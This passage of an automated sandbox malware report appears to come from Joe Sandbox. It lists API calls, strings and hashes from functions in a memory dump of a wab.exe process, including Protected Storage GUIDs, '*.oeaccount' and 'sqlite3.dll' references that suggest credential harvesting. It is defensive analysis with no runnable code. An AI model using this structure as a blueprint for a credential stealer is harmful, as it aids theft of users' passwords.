                                                                                                                                                                                                          • Opcode ID: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                                          • Instruction ID: 2c87624536f7d1d2c67b3f30ed48d8bcf82a012ac595ca9270874480dc5e5985
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47028F71E00218AFDF14DF99DD81AAEBBB5EF08314F14005AFA04A7352E775AD41CB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                                          • Opcode ID: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                                          • Instruction ID: 3ed27bb9f02c74045d0acb38b61796dbe98832ce2e8f1163f6a46f85a071a1b4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C62181B2E106486BDB14DBA5D846EDF73ECEB94704F04082AB511D7241EB38E644C765
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                          • Opcode ID: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                                          • Instruction ID: ce7ce7a56e3d2054f407bfc67449f4b5e2a26b1e03fcf19820fefdebefcb5e48
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3312BF4A007008FE7509F7A8945626FBE4FF84315F65886FE259CB2A2D7B9D440CB29
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                          • Opcode ID: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                                          • Instruction ID: 580d5568a0ae36357fe55cd2f8a92ca16a000ad3cc3fb0fce8e347f768f52ea1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B02160B690115DABDF21EEA8CD40EDF7BADAF88304F0044AAB718E3052D2349F548B64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                          • Opcode ID: c734dfea12c93efd70da344448ab0c1d4400440b23c7d083a28a0ad16e48a0bf
                                                                                                                                                                                                          • Instruction ID: 593c26daf5a8157ef64f6677eb97e14ee4fb597551c84e1e3d2c0423d94ab2b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c734dfea12c93efd70da344448ab0c1d4400440b23c7d083a28a0ad16e48a0bf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01FCB5A40B0077E235AA35CC03F1A73A4AFD1718F000B1EF252666D2E7BCE509856D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: +MA$psow$winOpen
                                                                                                                                                                                                          • API String ID: 2221118986-3077801942
                                                                                                                                                                                                          • Opcode ID: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                                          • Instruction ID: 627c4099ad4ed317c867b58951a0fc316b0cffc8f2319acf44b2ebd0553f51b9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE718D72D00605EBDF10DFA9DC426DEBBB2AF44314F14412BF915AB291D7788D908B98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • variable number must be between ?1 and ?%d, xrefs: 0042BC19
                                                                                                                                                                                                          • too many SQL variables, xrefs: 0042BD54
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                          • API String ID: 2221118986-515162456
                                                                                                                                                                                                          • Opcode ID: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                          • Instruction ID: 0d9164a1fdbde5ca3cdd745d30cfe3dc8f536e44641e3c26b790e655cd3eaffd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71519D31B00525EFEB19DF69D481BEAB7A0FF08304F90016BE815AB251DB79AD51CBC8
                                                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: $, $CREATE TABLE
• API String ID: 3510742995-3459038510
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
• memset.MSVCRT ref: 0040269F
  • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
  • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
  • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
• LocalFree.KERNEL32(?), ref: 00402798
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
• String ID:
• API String ID: 1593657333-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040C642
• SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
• GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
• PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Message$MenuPostSendStringmemset
• String ID:
• API String ID: 3798638045-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
  • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
• strlen.MSVCRT ref: 0040B366
• atoi.MSVCRT ref: 0040B374
• _mbsicmp.MSVCRT ref: 0040B3C7
• _mbsicmp.MSVCRT ref: 0040B3DA
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: _mbsicmp$??2@??3@atoistrlen
• String ID:
• API String ID: 4107816708-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: strlen
• String ID: >$>$>
• API String ID: 39653677-3911187716
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
Uniqueness

Uniqueness Score: -1.00%

APIs
• strlen.MSVCRT ref: 00407709
• ??3@YAXPAX@Z.MSVCRT ref: 00407729
  • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
  • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
  • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
• ??3@YAXPAX@Z.MSVCRT ref: 0040774C
• memcpy.MSVCRT ref: 0040776C
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??3@$memcpy$mallocstrlen
• String ID:
• API String ID: 1171893557-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SHGetMalloc.SHELL32(?), ref: 00410890
• SHBrowseForFolder.SHELL32(?), ref: 004108C2
• SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
• _mbscpy.MSVCRT ref: 004108E9
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: BrowseFolderFromListMallocPath_mbscpy
• String ID:
• API String ID: 1479990042-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
  • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
• sprintf.MSVCRT ref: 0040B684
• SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
  • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
  • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
• sprintf.MSVCRT ref: 0040B6AE
• _mbscat.MSVCRT ref: 0040B6C1
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
• String ID:
• API String ID: 203655857-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040AB44
• memset.MSVCRT ref: 0040AB5A
  • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
  • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
• sprintf.MSVCRT ref: 0040AB84
  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
• String ID: </%s>
• API String ID: 3699762281-259020660
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: _ultoasprintf
• String ID: %s %s %s
• API String ID: 432394123-3850900253
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
• GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
  • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
  • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
  • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
• CloseHandle.KERNEL32(?,?), ref: 0040870D
  • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: File$??3@$??2@CloseCreateHandleReadSize
• String ID: C@
• API String ID: 1449862175-3201871010
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00409682
                                                                                                                                                                                                          • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                                          • String ID: 5\@
                                                                                                                                                                                                          • API String ID: 568519121-3174280609
                                                                                                                                                                                                          • Opcode ID: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                          • Instruction ID: d98da3e135da4b1536afdd38015dbf476e5e9df788621b23f2aabad48e216af8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F901D679810204EBDB209F85C881EBBB7F8FF84745F10482AE840A6291D3359D95CB79
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                                          • String ID: L$ini
                                                                                                                                                                                                          • API String ID: 714388716-4234614086
                                                                                                                                                                                                          • Opcode ID: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                          • Instruction ID: f535223de382355a817e33459d0294d4a206ca3c03f6505affaa6c17102478c3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE01B2B1D10218AFDF40DFA9D845ADEBBF4BB08348F14812AE515E6240EBB895458F99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • failed memory resize %u to %u bytes, xrefs: 00411074
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _msizerealloc
                                                                                                                                                                                                          • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                          • API String ID: 2713192863-2134078882
                                                                                                                                                                                                          • Opcode ID: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                          • Instruction ID: 1811babadabc61a025a406b62bb89d9ddf1cf6d87da65dd644d5d85db6a8a765
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12D0C23290C2207EEA122644BC06A5BBB91DF90370F10C51FF618951A0DA3A8CA0638A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                            • Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
                                                                                                                                                                                                            • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
                                                                                                                                                                                                            • Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
                                                                                                                                                                                                            • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
                                                                                                                                                                                                            • Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
                                                                                                                                                                                                            • Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
                                                                                                                                                                                                            • Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                          • String ID: menu_%d
                                                                                                                                                                                                          • API String ID: 1129539653-2417748251
                                                                                                                                                                                                          • Opcode ID: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                          • Instruction ID: fc9d5e34a24bd2be33db7f468ba420a1802cee0dbde2c18454a4e056650a0418
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96D0C23064174022FB3023266D0EF4B29595BC3B47F1400AEF400B10D2CBBC400486BE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                                                                                                                                                                                          • strrchr.MSVCRT ref: 00409579
                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040958E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                          • API String ID: 3334749609-1948609170
                                                                                                                                                                                                          • Opcode ID: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                                          • Instruction ID: 2d2b68270352c45da0ce721119a0fec427a5e2ae0c2a4fc26ba4743072087242
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C080521466A024F1173222AD03B4F05844F5370CF25005BFD01351C3EF9D453141FF
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                          • String ID: sqlite3.dll
                                                                                                                                                                                                          • API String ID: 1983510840-1155512374
                                                                                                                                                                                                          • Opcode ID: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                                          • Instruction ID: b4f080e30331be102d7f345a143f57ec91a882a22c28ed8e87256c61ce2af050
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3C0803240513125BB0177717C028AF7D48DF82394B01046EF58561111DD694D3255EB
                                                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
• GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileString
• String ID: 34@$Server Details
• API String ID: 1096422788-1041202369
• Opcode ID: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
• Instruction ID: 5dc36b059aaaf95d4d37dbe6dd28276a8f332030ee7f3b0879c7395586969e1a
• Opcode Fuzzy Hash: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
• Instruction Fuzzy Hash: FFC04C36948B01BBDE029F909D05F1EBE62BBA8B01F504519F285210AB82754524EB26
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
• Instruction ID: 1cbfd9147006f86015284e0c7f96a5a033359537089e49602f9f07bbf2bf02d4
• Opcode Fuzzy Hash: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
• Instruction Fuzzy Hash: B761DE72604702AFDB20DF65E981A6BB7E4FF44304F44492EFA5982250D738ED54CBDA
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: FreeLocalmemcpymemsetstrlen
• String ID:
• API String ID: 3110682361-0
• Opcode ID: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
• Instruction ID: 82d09d3ec766172f421874171fbd662b4eebf604b8883e80537bb62e226e9057
• Opcode Fuzzy Hash: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
• Instruction Fuzzy Hash: 0631F832D0011D9BDF10DB64CD81BDEBBB8EF55314F1005BAE984B7281DA799E85CB94
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID:
• API String ID: 3510742995-0
• Opcode ID: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
